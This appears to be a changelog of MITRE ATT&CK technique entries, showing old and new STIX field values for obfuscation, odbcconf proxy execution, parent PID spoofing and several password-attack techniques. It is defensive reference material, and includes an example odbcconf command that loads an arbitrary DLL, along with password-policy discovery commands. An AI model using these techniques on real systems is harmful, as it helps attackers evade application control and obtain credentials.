| description | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) |
| external_references[1]['source_name'] | capec | Volexity PowerDuke November 2016 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/267.html | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ |
| external_references[2]['source_name'] | Volexity PowerDuke November 2016 | GitHub Revoke-Obfuscation |
| external_references[2]['description'] | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018. |
| external_references[2]['url'] | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ | https://github.com/danielbohannon/Revoke-Obfuscation |
| external_references[3]['source_name'] | Linux/Cdorked.A We Live Security Analysis | FireEye Obfuscation June 2017 |
| external_references[3]['description'] | Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017. | Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. |
| external_references[3]['url'] | https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ | https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html |
| external_references[4]['source_name'] | Carbon Black Obfuscation Sept 2016 | FireEye Revoke-Obfuscation July 2017 |
| external_references[4]['description'] | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. |
| external_references[4]['url'] | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf |
| external_references[5]['source_name'] | FireEye Obfuscation June 2017 | GitHub Office-Crackros Aug 2016 |
| external_references[5]['description'] | Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018. | Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html | https://github.com/itsreallynick/office-crackros |
| external_references[6]['source_name'] | FireEye Revoke-Obfuscation July 2017 | Linux/Cdorked.A We Live Security Analysis |
| external_references[6]['description'] | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. | Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017. |
| external_references[6]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf | https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ |
| external_references[7]['source_name'] | PaloAlto EncodedCommand March 2017 | Carbon Black Obfuscation Sept 2016 |
| external_references[7]['description'] | White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018. | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ |
| external_references[8]['source_name'] | GitHub Revoke-Obfuscation | PaloAlto EncodedCommand March 2017 |
| external_references[8]['description'] | Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018. | White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018. |
| external_references[8]['url'] | https://github.com/danielbohannon/Revoke-Obfuscation | https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ |
| external_references[9]['source_name'] | GitHub Office-Crackros Aug 2016 | capec |
| external_references[9]['url'] | https://github.com/itsreallynick/office-crackros | https://capec.mitre.org/data/definitions/267.html |
| x_mitre_data_sources[0] | Command: Command Execution | Process: OS API Execution |
| x_mitre_data_sources[1] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Process: Process Creation | Module: Module Load |
| x_mitre_defense_bypassed[0] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[1] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[2] | Host intrusion prevention systems | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Application control | Application Control |
| x_mitre_defense_bypassed[4] | Log analysis | Log Analysis |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | File: File Metadata |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control by file name or path |
| Old Description | New Description |
|---|---|
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) |
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:39:00.717000+00:00 | 2022-03-11 18:52:49.877000+00:00 |
| description | Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
|
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.
Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
|
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 14:11:20.296000+00:00 | 2022-05-03 02:15:42.360000+00:00 |
| external_references[1]['source_name'] | DidierStevens SelectMyParent Nov 2009 | XPNSec PPID Nov 2017 |
| external_references[1]['description'] | Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019. | Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019. |
| external_references[1]['url'] | https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ | https://blog.xpnsec.com/becoming-system/ |
| external_references[2]['source_name'] | Microsoft UAC Nov 2018 | CounterCept PPID Spoofing Dec 2018 |
| external_references[2]['description'] | Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019. | Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019. |
| external_references[2]['url'] | https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works | https://www.countercept.com/blog/detecting-parent-pid-spoofing/ |
| external_references[3]['source_name'] | CounterCept PPID Spoofing Dec 2018 | Microsoft UAC Nov 2018 |
| external_references[3]['description'] | Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019. | Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019. |
| external_references[3]['url'] | https://www.countercept.com/blog/detecting-parent-pid-spoofing/ | https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works |
| external_references[4]['source_name'] | CTD PPID Spoofing Macro Mar 2019 | Microsoft Process Creation Flags May 2018 |
| external_references[4]['description'] | Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019. | Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019. |
| external_references[4]['url'] | https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ | https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags |
| external_references[5]['source_name'] | XPNSec PPID Nov 2017 | Secuirtyinbits Ataware3 May 2019 |
| external_references[5]['description'] | Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019. | Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019. |
| external_references[5]['url'] | https://blog.xpnsec.com/becoming-system/ | https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 |
| external_references[6]['source_name'] | Microsoft Process Creation Flags May 2018 | DidierStevens SelectMyParent Nov 2009 |
| external_references[6]['description'] | Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019. | Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019. |
| external_references[6]['url'] | https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags | https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ |
| external_references[7]['source_name'] | Secuirtyinbits Ataware3 May 2019 | CTD PPID Spoofing Macro Mar 2019 |
| external_references[7]['description'] | Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019. | Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019. |
| external_references[7]['url'] | https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 | https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ |
| x_mitre_data_sources[1] | Process: Process Creation | Process: Process Metadata |
| x_mitre_data_sources[2] | Process: Process Metadata | Process: Process Creation |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mohamed Kmal'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-55 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 15:39:59.041000+00:00 | 2022-04-19 21:33:46.023000+00:00 |
| description | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. | Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. |
| external_references[1]['source_name'] | capec | US-CERT-TA18-106A |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/55.html | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/55.html', 'external_id': 'CAPEC-55'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-49 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:35.269000+00:00 | 2022-07-22 18:37:22.173000+00:00 |
| description | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. | Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. |
| external_references[1]['source_name'] | capec | Trend Micro Emotet 2020 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/49.html | https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'} | |
| x_mitre_contributors | Mohamed Kmal | |
| x_mitre_platforms | Network |
| Description |
|---|
| Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019) Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 17:58:03.269000+00:00 | 2022-03-25 13:18:55.310000+00:00 |
| external_references[2]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
| STIX Field | Old value | New value |
|---|---|---|
